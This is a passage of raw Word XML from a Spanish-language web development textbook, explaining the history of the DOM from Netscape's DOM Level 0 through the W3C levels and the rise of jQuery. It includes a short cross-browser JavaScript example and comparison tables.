      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="592931D4" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc239319974"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Qué dice</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="1C69887B" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">En 1995, cuando Netscape incorporó JavaScript, hizo falta darle al lenguaje alguna forma de tocar la página. La solución fue mínima —un puñado de colecciones, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>document.forms</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>document.images</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>document.links</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">— y nunca se especificó: se la conoce como </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>DOM Level 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>. Cuando las páginas quisieron modificar cualquier elemento y no sólo los formularios, cada navegador inventó su propia extensión.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A590D5" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc239319975"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>En criollo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="45B1ED0E" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">Internet Explorer 4 sacó </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>document.all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">; Netscape 4, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Cdigoenlnea"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>document.layers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">. Y acá va lo que importa: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>no eran dos sintaxis para lo mismo, eran dos modelos incompatibles.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Una página que anduviera en los dos había que escribirla dos veces:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E01C55" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>if (document.all) {         // Internet Explorer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11ABD873" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">  var el = document.all["carrito"];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089B7904" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>} else if (document.layers) { // Netscape</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7E3BA2" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">  var el = document.layers["carrito"];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C2A3FF" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Bloquedecdigo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1A47ED" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve">El W3C puso orden con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>DOM Level 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> (octubre de 1998), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Level 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2000, que aportó el sistema de eventos de 4.8) y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Level 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2004). Hoy el DOM se mantiene como </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>estándar viviente del WHATWG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>, sin niveles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71462437" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc239319976"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Las tres decisiones que explican su forma actual</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tablaconcuadrcula"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3005"/>
        <w:gridCol w:w="3005"/>
        <w:gridCol w:w="3006"/>
      </w:tblGrid>
      <w:tr w:rsidR="0000351B" w14:paraId="37C5B448"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AE83902" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Decisión</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9DFD247" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Qué gana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A92AB63" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Qué te cuesta hoy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="255D366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6A1F44A" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>1. Es independiente del lenguaje.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> Se especificó en una notación abstracta de interfaces, implementable desde Java, Python o C++ y no sólo desde JavaScript</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7E259551" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Cualquier lenguaje manipula un documento con el mismo modelo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="02DE4DD9" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">La verbosidad: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>createElement</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>setAttribute</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>appendChild</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>No está diseñada para ser cómoda en JavaScript, sino neutral</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="5ACA8AB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3FCEC95" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>2. El modelo es vivo.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> El árbol no es una fotografía del documento: es el documento. Modificar un nodo cambia la página al instante, y algunas colecciones se actualizan solas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="190CCE79" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Tocás el árbol y la pantalla ya cambió</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1B59B03B" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Uno de los bugs más difíciles de ver del frontend (4.5.2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="5747E8C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7389308" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>3. El modelo de eventos es un compromiso político.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> Netscape propagaba </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>de la raíz al elemento</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> —captura— y Microsoft </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>del elemento a la raíz</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> —burbujeo—. El W3C </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>adoptó las dos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="406D59BF" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Nadie tuvo que tirar su implementación</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3E18C4EF" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">Un evento recorre el árbol </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>dos veces</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">, y </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>addEventListener</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> tiene un tercer parámetro que casi nadie usa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7CB9FFF8" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>El DOM es el enchufe universal del aeropuerto:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> más incómodo que el de tu casa, y no por mal diseño — es incómodo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>porque</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t xml:space="preserve"> sirve en todos lados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069DB998" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc239319977"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>Corresponde hablar de jQuery</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="6BE5B04B" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
      <w:pPr>
        <w:pStyle w:val="Cuerpo"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-AR"/>
        </w:rPr>
        <w:t>La publicó John Resig en 2006 y resolvió tres problemas reales:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tablaconcuadrcula"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3007"/>
        <w:gridCol w:w="3006"/>
        <w:gridCol w:w="3003"/>
      </w:tblGrid>
      <w:tr w:rsidR="0000351B" w14:paraId="315CEBC1"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5A9104D" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Qué resolvía jQuery en 2006</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1E338E9" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Qué lo reemplazó</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50AFB71" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Desde</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="71AF220F"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4CD0C73" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Las incompatibilidades entre navegadores</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5963809A" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>addEventListener</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve"> en todos, y el estándar del WHATWG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="59497234" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Hacia 2010</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="4A259F9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6BA8C3D" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Una interfaz mucho más concisa que la del W3C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1DA2E47E" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>classList</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>dataset</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>closest</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>append</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Cdigoenlnea"/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>fetch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0D247192" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>2011 a 2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000351B" w14:paraId="733367D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06759FD" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>Seleccionar con selectores CSS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-AR"/>
              </w:rPr>
              <w:t>, que el DOM no sabía hacer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="999999"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="37F4105C" w14:textId="77777777" w:rsidR="0000351B" w:rsidRDefault="00346AC7">
            <w:pPr>
              <w:pStyle w:val="Cuerpo"/>
              <w:spacing w:after="0"/>
            </w:pPr>
